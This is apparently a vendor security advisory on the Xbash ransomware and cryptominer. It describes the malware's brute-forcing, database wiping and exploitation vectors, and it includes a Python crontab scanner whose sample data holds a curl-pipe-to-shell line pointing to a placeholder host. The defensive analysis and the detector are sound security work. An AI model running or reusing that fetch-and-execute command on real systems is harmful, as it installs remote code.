Xbash is written in Python and then packaged as a Portable Executable (PE) file to evade detection, so that it can be installed and execute commands across platforms.
The ports are as follows:
3389
Xbash brute-forces services such as Rsync, VNC, phpMyAdmin, MySQL, PostgreSQL, MongoDB and Redis using a built-in dictionary of weak passwords.
If it successfully logs into MySQL, MongoDB or PostgreSQL, it may delete the databases on the server, create a new one and write a message demanding a ransom.
The following vulnerabilities may be exploited to spread the ransomware:
Hadoop YARN ResourceManager vulnerability that allows command execution without verifying the caller's identity
ActiveMQ vulnerability that allows writing to an arbitrary file
Redis vulnerability that allows writing to an arbitrary file and remote command execution
It writes a corresponding Crontab task so that it starts automatically and downloads the mining script on schedule. After removing every other family of mining program found on the Linux system, it downloads and executes its own mining program.
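The Crontab persistence described above is something a defender can check for directly. The following is an added example (not part of the original advisory or of Sangfor's tooling) that parses crontab text and flags entries that fetch a remote resource and execute it; the crontab content and the host name are constructed sample data.

```python
import re
from typing import Dict, List

# Patterns typical of download-and-execute persistence: a fetch tool whose
# output feeds a shell, or a fetch chained with execution of the saved file.
FETCH_RE = re.compile(r"\b(curl|wget)\b")
URL_RE = re.compile(r"https?://\S+")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(ba)?sh\b")
CHAINED_EXEC_RE = re.compile(r"(&&|;)\s*(ba)?sh\s+\S+")

def parse_crontab(text: str) -> List[Dict[str, str]]:
    """Split crontab text into schedule/command entries; comments, blank
    lines and VAR=value assignments are skipped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):  # @reboot, @daily and similar shortcuts
            parts = line.split(None, 1)
            if len(parts) == 2:
                entries.append({"schedule": parts[0], "command": parts[1]})
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue  # not a five-field schedule followed by a command
        entries.append({"schedule": " ".join(parts[:5]), "command": parts[5]})
    return entries

def flag_download_exec(entries: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return entries that both fetch a URL and run what was fetched, the
    shape used by cron-based miner persistence. A plain download with no
    execution is not flagged."""
    flagged = []
    for e in entries:
        cmd = e["command"]
        fetches = bool(FETCH_RE.search(cmd) and URL_RE.search(cmd))
        executes = bool(PIPE_TO_SHELL_RE.search(cmd) or CHAINED_EXEC_RE.search(cmd))
        if fetches and executes:
            flagged.append(e)
    return flagged

# Constructed sample crontab: two benign entries and one suspicious entry.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL http://malicious.invalid/update.sh | sh
30 1 * * 0 /usr/local/bin/backup.sh --full
"""

if __name__ == "__main__":
    for hit in flag_download_exec(parse_crontab(SAMPLE_CRONTAB)):
        print(f"suspicious: [{hit['schedule']}] {hit['command']}")
```

On a live host, feed it the output of `crontab -l` for each user and the contents of the files under /etc/cron.d.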
1. Change computer passwords to stronger ones. Avoid using the same password on different computers, because if one computer is compromised, all the others may be compromised as well.
2. Keep the malware signature database on your Sangfor NGAF up to date to enable Xbash traffic detection.
3. Enable WAF on your Sangfor NGAF to prevent Xbash attacks against websites.
4. Sangfor NGAF can prevent brute-force attacks. Turn on brute-force attack prevention on NGAF.
5. Perform a security scan and virus removal on the whole network. We recommend Sangfor NGAF and EDR to detect, prevent and protect your internal network. Individuals can download and install the following tool: http://go.sangfor.com/edr-tool-20180921